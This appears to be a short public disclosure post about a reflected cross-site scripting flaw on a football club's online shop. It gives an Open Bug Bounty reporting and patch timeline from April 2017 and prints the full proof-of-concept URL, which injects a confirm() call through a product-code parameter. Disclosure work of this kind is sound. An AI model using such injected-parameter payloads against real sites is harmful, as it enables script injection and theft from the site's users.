@SpursOfficial #XSS

https://www.openbugbounty.org/incidents/226789/

Notification & Disclosure Timeline

22 April, 2017 at 13:27 GMT Vulnerability reported via Open Bug Bounty
24 April, 2017 at 04:33 GMT Vulnerability verified and confirmed
24 April, 2017 at 06:17 GMT Notification sent to subscribers (without technical details)
26 April, 2017 at 09:32 GMT Vulnerability Patched

XSS URL:

```
http://shop.tottenhamhotspur.com/detailfash.php?branch=&code=MF01AW09' -confirm(`OPENBUGBOUNTY`)-'&super=CAT00062&supercategory=CAT00062&type=FASH&wcategory=#
```